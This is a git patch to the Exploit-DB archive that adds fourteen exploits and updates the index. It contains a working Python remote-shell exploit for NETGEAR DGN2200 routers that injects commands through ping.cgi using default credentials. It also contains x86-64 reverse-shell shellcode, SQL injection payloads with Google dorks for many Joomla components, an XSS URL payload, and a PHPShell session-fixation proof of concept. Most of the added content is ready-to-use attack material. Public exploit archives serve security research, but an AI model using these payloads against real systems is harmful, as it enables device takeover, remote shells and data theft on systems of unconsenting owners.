From ae0dd9fa7cf71a5ee27c38be5a9c2b825e17b1b8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 20 Feb 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-02-20 14 new exploits Linux - Reverse Shell Shellcode (66 bytes) Joomla! Component com_Joomlaoc - 'id' SQL Injection Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting Horde 3.3.5 - Cross-Site Scripting Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection Joomla! Component OS Property 3.0.8 - SQL Injection Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection Joomla! Component OS Services Booking 2.5.1 - SQL Injection Joomla! Component Room Management 1.0 - SQL Injection Joomla! Component Bazaar Platform 3.0 - SQL Injection Joomla! Component Google Map Store Locator 4.4 - SQL Injection Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution Sawmill Enterprise 8.7.9 - Authentication Bypass PHPShell 2.4 - Session Fixation --- files.csv | 22 ++++- platforms/hardware/webapps/41394.py | 58 +++++++++++ platforms/linux/shellcode/41398.nasm | 71 ++++++++++++++ platforms/php/webapps/33406.txt | 2 +- platforms/php/webapps/41383.txt | 17 ++++ platforms/php/webapps/41384.txt | 18 ++++ platforms/php/webapps/41385.txt | 17 ++++ platforms/php/webapps/41386.txt | 17 ++++ platforms/php/webapps/41387.txt | 17 ++++ platforms/php/webapps/41388.txt | 21 ++++ platforms/php/webapps/41389.txt | 23 +++++ platforms/php/webapps/41390.txt | 23 +++++ platforms/php/webapps/41391.txt | 19 ++++ platforms/php/webapps/41393.txt | 20 ++++ platforms/php/webapps/41396.txt | 136 ++++++++++++++++++++++++++ platforms/windows/webapps/41395.txt | 138 +++++++++++++++++++++++++++ 16 files changed, 614 insertions(+), 5 deletions(-) create mode 100755 platforms/hardware/webapps/41394.py create mode 100755 platforms/linux/shellcode/41398.nasm create mode 100755 platforms/php/webapps/41383.txt create mode 100755 platforms/php/webapps/41384.txt create mode 100755 platforms/php/webapps/41385.txt create mode 100755 platforms/php/webapps/41386.txt create mode 100755 platforms/php/webapps/41387.txt create mode 100755 platforms/php/webapps/41388.txt create mode 100755 platforms/php/webapps/41389.txt create mode 100755 platforms/php/webapps/41390.txt create mode 100755 platforms/php/webapps/41391.txt create mode 100755 platforms/php/webapps/41393.txt create mode 100755 platforms/php/webapps/41396.txt create mode 100755 platforms/windows/webapps/41395.txt diff --git a/files.csv b/files.csv index 8975101b6..053b676f2 100644 --- a/files.csv +++ b/files.csv @@ -15898,6 +15898,7 @@ id,file,description,date,author,platform,type,port 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 +41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -21643,7 +21644,7 @@ id,file,description,date,author,platform,type,port 9601,platforms/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps,0 9602,platforms/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 -9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 +9604,platforms/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 @@ -22939,7 +22940,7 @@ id,file,description,date,author,platform,type,port 12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0 12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 -12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0 +12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0 12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0 12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0 12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 @@ -25626,7 +25627,7 @@ id,file,description,date,author,platform,type,port 19792,platforms/php/webapps/19792.txt,"Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0 19825,platforms/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,php,webapps,0 19964,platforms/php/webapps/19964.txt,"PHP-Nuke module (SPChat) - SQL Injection",2012-07-20,"Yakir Wizman",php,webapps,0 -19829,platforms/php/webapps/19829.txt,"Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0 +19829,platforms/php/webapps/19829.txt,"Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0 19862,platforms/php/webapps/19862.pl,"WordPress Theme Diary/Notebook Site5 - Email Spoofing",2012-07-16,bwall,php,webapps,0 19863,platforms/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0 @@ -27494,7 +27495,7 @@ id,file,description,date,author,platform,type,port 25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps,0 -33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - Administration Interface admin/cmdshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - showgallery.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 @@ -37300,3 +37301,16 @@ id,file,description,date,author,platform,type,port 41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 +41383,platforms/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41384,platforms/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41385,platforms/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41386,platforms/php/webapps/41386.txt,"Joomla! Component OS Property 3.0.8 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41387,platforms/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41388,platforms/php/webapps/41388.txt,"Joomla! Component OS Services Booking 2.5.1 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0 +41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0 +41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0 diff --git a/platforms/hardware/webapps/41394.py b/platforms/hardware/webapps/41394.py new file mode 100755 index 000000000..0b9508ec0 --- /dev/null +++ b/platforms/hardware/webapps/41394.py @@ -0,0 +1,58 @@ +#!/usr/bin/python +#Provides access to default user account, privileges can be easily elevated by using either: +# - a kernel exploit (ex. memodipper was tested and it worked) +# - by executing /bin/bd (suid backdoor present on SOME but not all versions) +# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon along with the 2nd vuln) + +#Pozdrawiam: Kornela, Komara i Sknerusa + +import sys +import requests + +#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions +#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to + +login = 'admin' +password = 'password' + + +def main(): + if len(sys.argv) < 2 or len(sys.argv) == 3: + print "./netgearpwn.py " + return + spawnShell() + +def execute(cmd): + r = requests.post("http://" + sys.argv[1] + "/ping.cgi", data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping':"Ping", 'ping_IPAddr':"12.12.12.12; " + cmd}, auth=(login, password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"}) + result = parseOutput(r.text) + return result + +def spawnShell(): + r = execute("echo pwn3d") + + if any("pwn3d" in s for s in r) == False: + print "Something went wrong, is the system vulnerable? Are the credentials correct?" + return + + while True: + cmd = raw_input("$ ") + r = execute(cmd) + for l in r: + print l.encode("utf-8") + +def parseOutput(output): + yet = False + a = False + result = [] + for line in output.splitlines(): + if line.startswith(""): + break + result.append(line) + return result + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/platforms/linux/shellcode/41398.nasm b/platforms/linux/shellcode/41398.nasm new file mode 100755 index 000000000..73400add3 --- /dev/null +++ b/platforms/linux/shellcode/41398.nasm @@ -0,0 +1,71 @@ +;The MIT License (MIT) + +;Copyright (c) 2017 Robert L. Taylor + +;Permission is hereby granted, free of charge, to any person obtaining a +;copy of this software and associated documentation files (the “Software”), +;to deal in the Software without restriction, including without limitation +;the rights to use, copy, modify, merge, publish, distribute, sublicense, +;and/or sell copies of the Software, and to permit persons to whom the +;Software is furnished to do so, subject to the following conditions: + +;The above copyright notice and this permission notice shall be included +;in all copies or substantial portions of the Software. + +;The Software is provided “as is”, without warranty of any kind, express or +;implied, including but not limited to the warranties of merchantability, +;fitness for a particular purpose and noninfringement. In no event shall the +;authors or copyright holders be liable for any claim, damages or other +;liability, whether in an action of contract, tort or otherwise, arising +;from, out of or in connection with the software or the use or other +;dealings in the Software. +; +; For a detailed explanation of this shellcode see my blog post: +; http://a41l4.blogspot.ca/2017/02/assignment-2b.html + +global _start +section .text +_start: +; Socket + push 41 + pop rax + push 2 + pop rdi + push 1 + pop rsi + cdq + syscall +; Connect + xchg edi, eax + push rdx + mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002 + not rbx + push rbx + mov al, 42 + push rsp + pop rsi + mov dl, 16 + syscall +; Dup 2 + push 3 + pop rsi +dup2loop: + mov al, 33 + dec esi + syscall + loopnz dup2loop +; Execve + ; rax and rsi are zero from the result of the last dup2 syscall and loop + push rax ; zero terminator for the following string that we are pushing + + mov rbx, '/bin//sh' + push rbx + + ; store /bin//sh address in RDI + push rsp + pop rdi + + cdq ; zero rdx + + mov al, 59 + syscall diff --git a/platforms/php/webapps/33406.txt b/platforms/php/webapps/33406.txt index 943a0c4b0..45770c70e 100755 --- a/platforms/php/webapps/33406.txt +++ b/platforms/php/webapps/33406.txt @@ -8,4 +8,4 @@ This issue affects versions prior to Horde 3.3.6. Note that additional products that use the Horde framework may also be vulnerable. -http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid> \ No newline at end of file +http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde= \ No newline at end of file diff --git a/platforms/php/webapps/41383.txt b/platforms/php/webapps/41383.txt new file mode 100755 index 000000000..3d8692e91 --- /dev/null +++ b/platforms/php/webapps/41383.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection +# Google Dork: inurl:index.php?option=com_joomloc +# Date: 18.02.2017 +# Vendor Homepage: http://www.joomloc.fr.nf/ +# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/ +# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/ +# Version: 4.1.3 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41384.txt b/platforms/php/webapps/41384.txt new file mode 100755 index 000000000..ac7836ae5 --- /dev/null +++ b/platforms/php/webapps/41384.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Joomla! Component Joomloc-Lite v1.3.2 - SQL Injection +# Google Dork: inurl:index.php?option=com_joomloc +# Date: 18.02.2017 +# Vendor Homepage: http://www.joomloc.fr.nf/ +# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-lite/ +# Demo: http://www.joomloc.fr.nf/joomloclite/ +# Version: 1.3.2 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=[SQL] +# # # # # + diff --git a/platforms/php/webapps/41385.txt b/platforms/php/webapps/41385.txt new file mode 100755 index 000000000..ddaa84988 --- /dev/null +++ b/platforms/php/webapps/41385.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component JomWALL v4.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_awdwall +# Date: 18.02.2017 +# Vendor Homepage: http://dashbite.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/jomwall/ +# Demo: http://demo-dashbite.com/ +# Version: 4.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_awdwall&task=gethovercard&wuid=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41386.txt b/platforms/php/webapps/41386.txt new file mode 100755 index 000000000..986774e2b --- /dev/null +++ b/platforms/php/webapps/41386.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component OS Property v3.0.8 - SQL Injection +# Google Dork: inurl:index.php?option=com_osproperty +# Date: 18.02.2017 +# Vendor Homepage: https://www.joomdonation.com/ +# Software Buy: https://www.joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html +# Demo: http://osproperty.ext4joomla.com/ +# Version: 3.0.8 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_osproperty&view=ltype&catIds[0]=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41387.txt b/platforms/php/webapps/41387.txt new file mode 100755 index 000000000..1a8effa74 --- /dev/null +++ b/platforms/php/webapps/41387.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component EShop v2.5.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_eshop +# Date: 18.02.2017 +# Vendor Homepage: https://www.joomdonation.com/ +# Software Buy: https://www.joomdonation.com/joomla-extensions/eshop-joomla-shopping-cart.html +# Demo: http://joomdonationdemo.com/eshop +# Version: 2.5.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_eshop&view=category&id=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41388.txt b/platforms/php/webapps/41388.txt new file mode 100755 index 000000000..d88e19855 --- /dev/null +++ b/platforms/php/webapps/41388.txt @@ -0,0 +1,21 @@ +# # # # # +# Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_osservicesbooking +# Date: 18.02.2017 +# Vendor Homepage: https://www.joomdonation.com/ +# Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html +# Demo: http://osb.ext4joomla.com/ +# Version: 2.5.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL] +# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL] +# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL] +# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL] +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41389.txt b/platforms/php/webapps/41389.txt new file mode 100755 index 000000000..cf49a4622 --- /dev/null +++ b/platforms/php/webapps/41389.txt @@ -0,0 +1,23 @@ +# # # # # +# Exploit Title: Joomla! Component Room Management v1.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_roommgmt +# Date: 18.02.2017 +# Vendor Homepage: http://matamko.com/ +# Software Buy: http://matamko.com/products/room-management/live-demo +# Demo: http://matamko.com/products/room-management/live-demo +# Version: 1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/room/book?tmpl=component&id=5&date=[SQL] +# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=[SQL] +# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=0&id=[SQL] +# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41390.txt b/platforms/php/webapps/41390.txt new file mode 100755 index 000000000..661b754d2 --- /dev/null +++ b/platforms/php/webapps/41390.txt @@ -0,0 +1,23 @@ +# # # # # +# Exploit Title: Joomla! Component Bazaar Platform v3.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_bazaar +# Date: 18.02.2017 +# Vendor Homepage: http://matamko.com/ +# Software Buy: http://matamko.com/products/bazaar/live-demo +# Demo: http://matamko.com/products/bazaar/live-demo +# Version: 3.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=[SQL] +# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=[SQL] +# 1'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# http://localhost/[PATH]/index.php?option=com_bazaar&view=product&productid=[SQL] +# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41391.txt b/platforms/php/webapps/41391.txt new file mode 100755 index 000000000..56f73a6fb --- /dev/null +++ b/platforms/php/webapps/41391.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Google Map Store Locator v4.4 - SQL Injection +# Google Dork: inurl:index.php?option=com_googlemaplocator +# Date: 18.02.2017 +# Vendor Homepage: http://matamko.com/ +# Software Buy: http://matamko.com/products/google-map-store-locator/live-demo +# Demo: http://gtlocator4.demo.matamko.com/ +# Version: 4.4 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/?filter_to=a&filter_day=21-02-2017&filter_time=[SQL] +# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41393.txt b/platforms/php/webapps/41393.txt new file mode 100755 index 000000000..ceeb2d29a --- /dev/null +++ b/platforms/php/webapps/41393.txt @@ -0,0 +1,20 @@ +# # # # # +# Exploit Title: Joomla! Component Most Wanted Real Estate v1.1.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_mostwantedrealestate +# Date: 18.02.2017 +# Vendor Homepage: http://mostwantedrealestatesites.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/most-wanted-real-estate/ +# Demo: http://demo.mostwantedrealestatesites.com/ +# Version: 1.1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=&filter_a1minland=&filter_a1maxland=&filter_a1landtype=0&which_order=[SQL] +# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=[SQL] +# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=[SQL] +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41396.txt b/platforms/php/webapps/41396.txt new file mode 100755 index 000000000..6aaffceae --- /dev/null +++ b/platforms/php/webapps/41396.txt @@ -0,0 +1,136 @@ +[+] Credits: John Page AKA hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt +[+] ISR: ApparitionSec + + + +Vendor: +================================== +sourceforge.net/projects/phpshell/ +phpshell.sourceforge.net/ + + + +Product: +============== +PHPShell v2.4 + + + +Vulnerability Type: +=================== +Session Fixation + + + +CVE Reference: +============== +N/A + + + +Security Issue: +================ +PHPShell does not regenerate the Session ID upon authentication, this can +potentially allow remote attackers to access parts of the application +using only a valid PHPSESSID if PHP.INI setting for +session.use_only_cookies=0. + +Since an existing XSS vulnerability exists in PHPShell " +http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt" +the risk is +increased if an authenticated user clicks an attacker supplied link and the +attacker finds way to access or set the victims Cookie. + +In 'phpshell.php' line 153 we see call to PHP function session_start(); + +After user authentication no call to "session_regenerate_id()" is made +leaving the authenticated session id same as pre-auth session id. +However, "session.use_only_cookies=1" is default since PHP 4.3.0, so to +exploit it would require that PHP.INI is set to session.use_only_cookies=0 +on the victims system. + +When accessing the application using the session fixation flaw and +attempting to run system command the application luckily redirects to login +form. +However, if a victim is actively changing directorys, reading files etc... +attackers may still be able to read current directory and files open +in the victims PHPShell console window. + + + +Exploit/POC: +============= + +1) Login to PHPShell run commands to CD to Windows directory and run DIR +command etc, then find and copy the PHPSESSID Cookie + +2) Open a second browser (InternetExplorer) and access the application +cleanly for first time using the PHPSESSID in URL. + +e.g. + +http://VICTIM-IP/phpshell-2.4/phpshell.php?PHPSESSID= + +You should see what the authenticated victim now sees... + +e.g. + +Current Working Directory: +Change to subdirectory: + +07/13/2009 08:51 PM 24,576 Microsoft.MediaCenter.iTv.Hosting.dll +11/20/2010 10:24 PM 147,968 Microsoft.MediaCenter.iTV.Media.dll +07/13/2009 08:52 PM 45,056 Microsoft.MediaCenter.ITVVM.dll +11/20/2010 10:24 PM 56,320 Microsoft.MediaCenter.Mheg.dll +11/20/2010 10:24 PM 114,688 Microsoft.MediaCenter.Playback.dll +11/20/2010 10:24 PM 1,572,864 Microsoft.MediaCenter.Shell.dll +11/20/2010 10:24 PM 241,664 Microsoft.MediaCenter.Sports.dll +11/20/2010 10:24 PM 327,168 +Microsoft.MediaCenter.TV.Tuners.Interop.dll +11/20/2010 10:24 PM 2,596,864 Microsoft.MediaCenter.UI.dll +10/29/2011 12:23 AM 465,920 mstvcapn.dll 